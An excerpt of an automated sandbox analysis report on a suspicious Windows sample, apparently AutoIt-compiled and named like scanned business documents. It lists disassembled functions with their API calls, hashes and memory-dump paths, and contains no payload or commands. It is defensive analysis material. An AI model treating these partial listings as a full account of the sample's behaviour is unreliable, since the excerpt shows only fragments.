                                                      • Opcode Fuzzy Hash: 66ca5031d8541d945a12c324c3a40c6b8f377d00ca35750d57f5a432ab7d60cb
                                                      • Instruction Fuzzy Hash: 7C310739206201DFC716DF28C495EAA77E8EF18318F258059E8168F7D2CB32EE41CB60
                                                      Function 00314653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00314705
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00314713
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0031471A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: fa0d552d6d382bdf4b0e212fb8fc2bb93c46d0f81301d17c1a38a73426c5c8e3
                                                      • Instruction ID: f444aff33a1a8a065dde9b9d3cb37ba5bc38fcefb8d3af39525dda16d619c55d
                                                      • Opcode Fuzzy Hash: fa0d552d6d382bdf4b0e212fb8fc2bb93c46d0f81301d17c1a38a73426c5c8e3
                                                      • Instruction Fuzzy Hash: F32160B5600208AFDB16DF64DCC1DA737ADEB5E798B150059FA109B2A1CB70EC51CB60
                                                      Function 002E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 176396367-2734436370
                                                      • Opcode ID: ef54e142b8741378206cfe76e05b5aac0c0044de3f617b26d72babf774aa3edf
                                                      • Instruction ID: ff1bd461d6cccee79fd01d323b6f7ed2b318c608720cb4035a211425ba90f638
                                                      • Opcode Fuzzy Hash: ef54e142b8741378206cfe76e05b5aac0c0044de3f617b26d72babf774aa3edf
                                                      • Instruction Fuzzy Hash: F82149722B459267C331AB269802FEB739C9F55300F904427FA4997081EB909DF1C691
                                                      Function 003137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00313840
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00313850
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00313876
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 32f4bd399d661d54fdfaaf4c6f46f3050bf156ce21f7ee0c89bad749f9c1e3b1
                                                      • Instruction ID: f1c4c795376e99e135e4ec13eddff637b45bd8b4562854b2fdd835988c75b15f
                                                      • Opcode Fuzzy Hash: 32f4bd399d661d54fdfaaf4c6f46f3050bf156ce21f7ee0c89bad749f9c1e3b1
                                                      • Instruction Fuzzy Hash: AF217C72610218BBEF269F54DC85EEB376EEF8D750F118124F9149B190C671DC928BA0
                                                      Function 002F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F4A08
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002F4A5C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,0031CC08), ref: 002F4AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      • API String ID: 2507767853-685833217
                                                      • Opcode ID: 9590a61f776bf0778fa7c1512ef337128168a6ff7ab77bd77fbe386596b862fa
                                                      • Instruction ID: a5a816f6839b8b361fa9954b4a42fdb6817f83e00db63fbf959b4f67c004d005
                                                      • Opcode Fuzzy Hash: 9590a61f776bf0778fa7c1512ef337128168a6ff7ab77bd77fbe386596b862fa
                                                      • Instruction Fuzzy Hash: CA319374A50109AFDB11EF54C881EAABBF8EF08308F1480A9F905DB252D771EE55CF61
                                                      Function 003141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0031424F
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00314264
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00314271
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: e27f7474b2a5de5e8694bc1918e3208451b97f0a747d490a19857a3caf3a6460
                                                      • Instruction ID: 74c91e4cfd6e2e67088b057ee03c3f996a2ee9d97be9de9c64374c257ecba033
                                                      • Opcode Fuzzy Hash: e27f7474b2a5de5e8694bc1918e3208451b97f0a747d490a19857a3caf3a6460
                                                      • Instruction Fuzzy Hash: 40110631240208BEEF225F28CC06FEB7BACEF99B54F120524FA55E60A0D271DC929B10
                                                      Function 002E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                        • Part of subcall function 002E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002E2DC5
                                                        • Part of subcall function 002E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E2DD6
                                                        • Part of subcall function 002E2DA7: GetCurrentThreadId.KERNEL32 ref: 002E2DDD
                                                        • Part of subcall function 002E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002E2DE4
                                                      • GetFocus.USER32 ref: 002E2F78
                                                        • Part of subcall function 002E2DEE: GetParent.USER32(00000000), ref: 002E2DF9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 002E2FC3
                                                      • EnumChildWindows.USER32(?,002E303B), ref: 002E2FEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 1272988791-1110647743
                                                      • Opcode ID: 61a8bf5143e63e300b1ffc60eb4afb60b82cf2141d2a991c1fc8131ab3b0889c
                                                      • Instruction ID: 08d7cfbd30c6c4b5fd7b5d15f352e43c3146d8726090c6e949e80a5990a69461
                                                      • Opcode Fuzzy Hash: 61a8bf5143e63e300b1ffc60eb4afb60b82cf2141d2a991c1fc8131ab3b0889c
                                                      • Instruction Fuzzy Hash: 1B110A75660245ABCF05BF71CC89EED376EAF88308F448075FA099B192DE3059598F70
                                                      Function 00315882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003158C1
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003158EE
                                                      • DrawMenuBar.USER32(?), ref: 003158FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      • API String ID: 3227129158-4108050209
                                                      • Opcode ID: d6f78125b39c4dc00196f4bfc113576f08ec965a20033d6c9216736cd26aeb9d
                                                      • Instruction ID: 1e4972afda67eabe8c3c8b6a79066ee042dd9fa1500039055f15f63675c45dc8
                                                      • Opcode Fuzzy Hash: d6f78125b39c4dc00196f4bfc113576f08ec965a20033d6c9216736cd26aeb9d
                                                      • Instruction Fuzzy Hash: 43018032510218EFDB669F12DC44BEEBBB9FF8A361F108099E849D6151DB308AD4DF21
                                                      Function 002E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2a197fc5684a363a7784f61f7807ed4f024fd6599885df23e6f58bd46e49835
                                                      • Instruction ID: c513465fe415adc06f6f893ec5d2f028b56d481237048fd6c3487c480f6d5148
                                                      • Opcode Fuzzy Hash: a2a197fc5684a363a7784f61f7807ed4f024fd6599885df23e6f58bd46e49835
                                                      • Instruction Fuzzy Hash: A6C18B75A50246EFDB04CFA5C884AAEB7B5FF48304F608598E905EF251C7B0ED92CB90
                                                      Function 0030342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                      • String ID:
                                                      • API String ID: 1998397398-0
                                                      • Opcode ID: 2232f6c2e986cc0423db8ba4a54548c206a33723000d0f595fc9458984b44d82
                                                      • Instruction ID: 0083a20b3c8021f631d595acbe7d1aa17616ec5373d0a55d97f36ba911d3169c
                                                      • Opcode Fuzzy Hash: 2232f6c2e986cc0423db8ba4a54548c206a33723000d0f595fc9458984b44d82
                                                      • Instruction Fuzzy Hash: C6A16B792153009FC701EF28C495A2AB7E9FF89714F148859F98A9B3A2DB30EE11CF51
                                                      Function 002E0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0031FC08,?), ref: 002E05F0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0031FC08,?), ref: 002E0608
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0031CC40,000000FF,?,00000000,00000800,00000000,?,0031FC08,?), ref: 002E062D
                                                      • _memcmp.LIBVCRUNTIME ref: 002E064E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 4d7026fc3f6935f864c456c4e4d7e71b0f2500525e27ead0cb4aa9644acf1b3f
                                                      • Instruction ID: a3fb6409ff93fb9b27d5855d41fb6aeab1eb4da5675df9a75231d62b91575c33
                                                      • Opcode Fuzzy Hash: 4d7026fc3f6935f864c456c4e4d7e71b0f2500525e27ead0cb4aa9644acf1b3f
                                                      • Instruction Fuzzy Hash: FE815971A1010AEFCB04DF94C984EEEB7B9FF89315F604198E516AB250DB71AE46CF60
                                                      Function 002C1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: a46dc362c400d9c65ff87dd78dad9de012e7daddb1f5ddf37f65ccb9f79a4560
                                                      • Instruction ID: 04e824aa0f6f41b8394342e1a2fec128e4dc461c3a43c2baa123afe61feedc0a
                                                      • Opcode Fuzzy Hash: a46dc362c400d9c65ff87dd78dad9de012e7daddb1f5ddf37f65ccb9f79a4560
                                                      • Instruction Fuzzy Hash: 71413B31570601ABDB396EF88C47FAE3AA4EF433B0F244329F818D6193EA7448715A61
                                                      Function 00316278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(00D3EB78,?), ref: 003162E2
                                                      • ScreenToClient.USER32(?,?), ref: 00316315
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00316382
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: a8b215008ab298cc39036f28891008eeeaca19f449c513dc689efe38b9683f1d
                                                      • Instruction ID: 9891c919113425200cfa0bf11ee3e03371cf71fb06cf3cba7df27c520c2788ec
                                                      • Opcode Fuzzy Hash: a8b215008ab298cc39036f28891008eeeaca19f449c513dc689efe38b9683f1d
                                                      • Instruction Fuzzy Hash: F1513C74A00209AFCB16DF94D881AEE7BB5EF49360F118559F8259B2A0D730ED91CB90
                                                      Function 00301AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00301AFD
                                                      • WSAGetLastError.WSOCK32 ref: 00301B0B
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00301B8A
                                                      • WSAGetLastError.WSOCK32 ref: 00301B94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$socket
                                                      • String ID:
                                                      • API String ID: 1881357543-0
                                                      • Opcode ID: a63e628868962ba30f3c642f881b2c81e57a25bece11975f92b14af572709239
                                                      • Instruction ID: f22eae4ab9e7125ef09d3c6ec89da0f5d44588b25c6159655a190248aeab1f49
                                                      • Opcode Fuzzy Hash: a63e628868962ba30f3c642f881b2c81e57a25bece11975f92b14af572709239
                                                      • Instruction Fuzzy Hash: 6B41B238640200AFE721AF24C886F6A77E5AF48718F54C498FA1A9F7D2D772DD51CB90
                                                      Function 002BB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50f73bd83f1f380e773822f570b50fd2768035c2c163961317fdc2712a3bf58d
                                                      • Instruction ID: 45f9ae0cb2c4f27eff44b4c1175c92854074363be3c378ddc98bcffecc5f72cf
                                                      • Opcode Fuzzy Hash: 50f73bd83f1f380e773822f570b50fd2768035c2c163961317fdc2712a3bf58d
                                                      • Instruction Fuzzy Hash: E7412B71920704AFD7259F78CC41BAABBB9FB89750F10462EF551DB282D7B199218B80
                                                      Function 002F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002F5783
                                                      • GetLastError.KERNEL32(?,00000000), ref: 002F57A9
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002F57CE
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002F57FA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 9983daba81dbe73cdaf0b4fb476c306ef5ce9549ebc507c22fa8860e94223468
                                                      • Instruction ID: 5de72acb35d7665dbb20e170b609d15a23bd200d3607a3675ba6ddef95a460be
                                                      • Opcode Fuzzy Hash: 9983daba81dbe73cdaf0b4fb476c306ef5ce9549ebc507c22fa8860e94223468
                                                      • Instruction Fuzzy Hash: 6E415C39210610DFCB11EF15C444A5DBBE1AF49720B18C898ED5A5B3A2CB34FD50CF91
                                                      Function 002BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,002A6D71,00000000,00000000,002A82D9,?,002A82D9,?,00000001,002A6D71,?,00000001,002A82D9,002A82D9), ref: 002BD910
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002BD999
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002BD9AB
                                                      • __freea.LIBCMT ref: 002BD9B4
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 8ae34b7966dc2b80642bc6f61694c1a92b4ec4097bb1287ba9a4f71b394d1c07
                                                      • Instruction ID: a722e96f178074a179916154b79bd0b9c04f85fdc455301e26ecc6c9a4aa3117
                                                      • Opcode Fuzzy Hash: 8ae34b7966dc2b80642bc6f61694c1a92b4ec4097bb1287ba9a4f71b394d1c07
